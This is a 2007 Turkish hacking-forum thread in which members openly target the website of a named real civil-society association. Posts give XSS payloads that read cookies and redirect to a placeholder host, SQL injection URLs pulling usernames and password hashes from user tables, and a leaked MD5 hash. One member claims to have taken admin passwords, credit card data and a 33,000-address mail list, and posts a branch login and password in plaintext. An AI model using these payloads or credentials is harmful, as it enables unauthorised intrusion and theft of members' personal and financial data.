Tahribat.com Forumları
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Çağdaş Yaşamı Destekleme Derneği XSS"Leri

Yazar 8mm (5) amele_2 (2) BiGGest (1) ByALeX (1) compedan (1) cyberwarrior (1) decameron (2) delidervis (1) editorial070 (1) iMPaLa (1) kaygusuz (1) pesimistzombie (1) Quetzalcoatl (1) retrem (1) samurai (2) telekom (2) teodos (1) turunc4u (6) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Çağdaş Yaşamı Destekleme Derneği XSS"Leri

1. 24/Nis/07 17:33 Kısayol Şikayet Özel Mesaj
   BartheZ
   
   
   

   Kayıt Tarihi: 03/Haziran/2002
   

   öncelikle çok büyük bir etki yaratabilecek xss açığı bulamadım. birkaç yerde açık var ama bu sitenin içeriğine erişim sağlamıyor. benim xss yiyen 2 tane açığım;

   1 - Editöre mesaj gönderme konsolunda, bu editöre değil başka bi yere de gidebilir tabi 

   http://www.cydd.org.tr/mesaj.asp?kime=BartheZ&konu=Tahribat

   2 - E-posta ekleme hücresinde. Yine burda html kodu çalıştırabiliyosunuz.

    

   Birde şube giriş konsolları var ancak MySql Injection açığı yok. Bilmiyorum farklı açıklar bulup indirebilen çıkar mı

   buyrun: http://www.cydd.org.tr/subegiris.asp 

    

   Türkan Saylan olayı.. Niye ÇYDD diye soran olursa.. 

   ---

   on error go to hell
   Alıntı yap
2. 24/Nis/07 17:47 Kısayol Şikayet Özel Mesaj
   delidervis
   
   

   Kayıt Tarihi: 05/Mart/2007
   

   helal sana hocam süpersin tam destek hep destek..
   Alıntı yap
3. 24/Nis/07 17:53 Kısayol Şikayet Özel Mesaj
   ByALeX
   
   

   Kayıt Tarihi: 24/Ağustos/2005
   

   TebrikLer Eyw (:

   ---

   Alim ile Sohbet Etmek Zümrüt ile incidir, Cahil ile Sohbet Etme Günde Bin Can incitir. Alim ile Sohbet Etmek Mertebe, Cahil ile Sohbet Etme Dönersin Merkebe, Eşek Alim Olmaz Kitap Taşımakla Tekkeye, insan da Hacı Olmaz Gitmekle Mekkeye.
   Alıntı yap
4. 24/Nis/07 18:29 Kısayol Şikayet Özel Mesaj
   turunc4u
   
   

   Kayıt Tarihi: 16/Ağustos/2006
   

   BartheZ bunu yazdı:
   -----------------------------
   

   öncelikle çok büyük bir etki yaratabilecek xss açığı bulamadım. birkaç yerde açık var ama bu sitenin içeriğine erişim sağlamıyor. benim xss yiyen 2 tane açığım;

   1 - Editöre mesaj gönderme konsolunda, bu editöre değil başka bi yere de gidebilir tabi 

   http://www.cydd.org.tr/mesaj.asp?kime=BartheZ&konu=Tahribat

    

   Türkan Saylan olayı.. Niye ÇYDD diye soran olursa.. 

   
   -----------------------------
   http://www.cydd.org.tr/default.asp?sayfa=forum Forumda kullanıcılar var onlara gidebilir :) Sitenin admini: editor  :)

   http://www.cydd.org.tr/default.asp?sayfa=mesaj&kime=xxs&konu=xss

    bLuetuLips<script></script><script>alert(document.cookie);</script><script>alert('Hmm XSS yiyiyo guzelce');</script><script>location.href('http://xssadresi/');</script>

   alttaki gibi olmuyo :) ama editore yukardaki gibi yollanırsa kesin olur ehueheueh inş :)

   http://www.cydd.org.tr/default.asp?sayfa=mesaj&kime=editor&konu=bLuetuLips<script></script><script>alert(document.cookie);</script><script>alert('Hmm XSS yiyiyo guzelce');</script><script>location.href('http://xssadresi/');</script>

   Alıntı yap
5. 07/May/07 21:29 Kısayol Şikayet Özel Mesaj
   turunc4u
   
   

   Kayıt Tarihi: 16/Ağustos/2006
   

   Server Error in Forum Application
   An error has occured while connecting to the database.
   Please contact the forum administrator.

   Support Error Code:- err_Access_db_connection
   File Name:- common.asp

   Error details:-
   Microsoft JET Database Engine
   Could not find file 'd:\cydd-org-tr\cyddorgtr\Forum\CYDDForum.mdb'.

   Hocam az kaldı bu sitenin açığını buluyorum :D forumu sistemlerinden kaldırmışlar ama yakalıcam bi açıklarını

   Alıntı yap
6. 07/May/07 21:38 Kısayol Şikayet Özel Mesaj
   pesimistzombie
   
   

   Kayıt Tarihi: 14/Haziran/2006
   

   duyuru eklemeleri için elbette bi panelleri vardır veya şu şube olayı eğer aynı db deyse buyrun sql deneyin

   http://www.cydd.org.tr/duyuru.asp?id=-1%20union+select+0,0+from+users+where+kullanici='admin'

    

   ---

   :|
   Alıntı yap
7. 07/May/07 21:41 Kısayol Şikayet Özel Mesaj
   decameron
   
   
   

   Kayıt Tarihi: 29/Haziran/2003
   

   gidin nakşibendi falan ipi sapı belli olmayan yasadışı tarikatların sitelerini hackleyin daha mahbuldür.

   ---

   Etinden korkanın kemiğini sikeyim!
   Alıntı yap
8. 07/May/07 22:45 Kısayol Şikayet Özel Mesaj
   Tabela Fatihi
   kaygusuz
   
   

   Kayıt Tarihi: 06/Nisan/2007
   

   DecaMeroN bunu yazdı:
   -----------------------------
   gidin nakşibendi falan ipi sapı belli olmayan yasadışı tarikatların sitelerini hackleyin daha mahbuldür.

   -----------------------------

   abü güzel diyosun da şunu belirteyim onlar beşiktaştada bi arkaadaş söylemişti onlar yüzyıllar önceden beri varızve olacağız hep diye içlerinde besledikleri içinde devamlı olacaktır eminim şu zamanda da benim tavsiyem pkk siteleri ilk başta

   ---

   Aldananlar aldanmaktan zevk aldıkları için hile ortaya çıkmıyordu Tolstoy
   Alıntı yap
9. 08/May/07 14:47 Kısayol Şikayet Özel Mesaj
   turunc4u
   
   

   Kayıt Tarihi: 16/Ağustos/2006
   

   Çağdaş yaşamı destekleyen yasakçı bi vakıf bölee bişi olabilir mi? Türkan Saylana aşırı gıcık kapıyorum :D Bu sisteme girilse en az 100 subdomain var. pesimistzombie malesef sql açık yok. Adamlar her türlü önlemlerini almışlar bekliyolar forumlar kapalı ziyaretci dft. bilmemne herşeyleri kapalı :D

   http://www.eskisehir.cydd.org.tr/sadesade/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+%20from+members+where+uye_id=1

   mencoglu

   c21ec73ddef2f89bd07611386e5c333e

   md5 :)
   Alıntı yap
10. 08/May/07 16:14 Kısayol Şikayet Özel Mesaj
    8mm
    
    
    

    Kayıt Tarihi: 01/Mart/2003
    

    Sitenin admin şifresinden kredi kartı bilgilerine..

    33.000 kusur mail listesinden 100 kusur subdomaini,

    Ve sube şifrelerini aldım :)

    Bu arada bLuetuLips Eskisehir'in login şifresi o değil o kendi sitesine login olduğu şifre.

    http://www.cydd.org.tr/subegiris.asp

    Kullanıcı: eskisehir

    Şifre: 6riyiju1

    Bu arada bu accounttan en son login olan kullanıcı sisteme : 14 defa girmiş son girişi : 03.04.2007 22:57:02 :))

    http://img513.imageshack.us/img513/2797/cyji2.png

    ---

    Kimse sana özgürlük veremez. Kimse sana eşitlik veya adalet veya başka birşey veremez. Eğer adamsan, sen alırsın. 8mm@tahribat.com
    Alıntı yap
11. 08/May/07 16:25 Kısayol Şikayet Özel Mesaj
    turunc4u
    
    

    Kayıt Tarihi: 16/Ağustos/2006
    

    8mm bunu yazdı:
    -----------------------------
    

    Sitenin admin şifresinden kredi kartı bilgilerine..

    33.000 kusur mail listesinden 100 kusur subdomaini,

    Ve sube şifrelerini aldım :)

    Bu arada bLuetuLips Eskisehir'in login şifresi o değil o kendi sitesine login olduğu şifre.

    http://www.cydd.org.tr/subegiris.asp

    Kullanıcı: eskisehir

    Şifre: 6riyiju1

    Bu arada bu accounttan en son login olan kullanıcı sisteme : 14 defa girmiş son girişi : 03.04.2007 22:57:02 :))

    
    -----------------------------

    Çok büyük bi haber olabilir :D Tv kanallarında filan :) Ben o kadar uğraştım amk. "Mdb"

    Alıntı yap

Cevapla